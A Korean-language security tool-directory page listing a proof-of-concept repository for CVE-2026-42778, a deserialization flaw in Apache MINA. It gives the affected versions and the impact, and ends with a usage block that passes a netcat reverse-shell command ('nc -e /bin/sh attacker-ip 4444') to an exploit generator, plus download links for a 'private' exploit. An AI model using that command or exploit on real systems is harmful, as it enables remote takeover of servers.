Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2026-42778-POC — CVE-2026-42778 EUVD-2026-26492 신뢰할 수 없는 데이터의 역직렬화 (CWE-502) | Kitploit
도구/GitHubGitHub/akinfue/cve-2026-42778-poc
Vulnerability AnalysisExploitationWeb Application ExploitationPayload DevelopmentBinary Exploitation
GitHubakinfue/cve-2026-42778-poc

CVE-2026-42778-POC

CVE-2026-42778 EUVD-2026-26492 신뢰할 수 없는 데이터의 역직렬화 (CWE-502)

저장소 보기
3개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2026-42778

개요

Apache MINA AbstractIoBuffer.getObject() 메서드의 불완전한 수정. 역직렬화할 수 있는 클래스를 제한하는 클래스 이름 허용 목록 검증이 너무 늦게 적용되어, 읽히는 클래스의 정적 초기화자가 이미 실행된 후에야 적용됩니다. 이는 CVE-2024-52046에 대한 원래 수정이 2.1.X 및 2.2.X 브랜치에 제대로 적용되지 않았기 때문에 발생합니다. 영향을 받는 버전: - Apache MINA 2.1.0 ~ 2.1.11 - Apache MINA 2.2.0 ~ 2.2.6

익스플로잇:

여기에서 다운로드

세부 정보

  • CVE ID: CVE-2026-42778

  • 게시일: 2026-01-05

  • 영향: 치명적

  • 익스플로잇 공개 여부: 비공개, 비공개 전용.

  • CVSS: 9.8

  • 패치 가능 여부: (아직 공식 패치 없음)

영향

공격자는 악의적인 직렬화 객체를 제작하여 IoBuffer.getObject()가 처리할 때 클래스 이름 허용 목록 검증이 발생하기 전에 정적 초기화자를 통해 임의 코드를 실행할 수 있습니다. 이는 권한이나 사용자 상호 작용이 필요 없는 네트워크 접근 가능 취약점이므로, IoBuffer.getObject() 메서드를 호출하는 Apache MINA를 사용하는 모든 애플리케이션에서 원격 코드 실행이 가능합니다. 이 취약점은 영향을 받는 시스템의 기밀성, 무결성 및 가용성을 완전히 손상시킬 수 있습니다.

영향을 받는 버전

  • Apache MINA 2.1.0 ~ 2.1.11
  • Apache MINA 2.2.0 ~ 2.2.6

사용법

root@kitploit:~
# 컴파일 및 생성
javac ExploitGenerator.java
java ExploitGenerator "nc -e /bin/sh attacker-ip 4444"

# ObjectSerializationCodecFactory를 사용하는 MINA 기반 서비스로 네트워크를 통해 전송
# 또는 IoBuffer.getObject()를 호출하는 모든 엔드포인트

연락처

  • 문의 사항은 다음으로 연락하세요:[email protected]
  • 익스플로잇 : 여기
도구 다운로드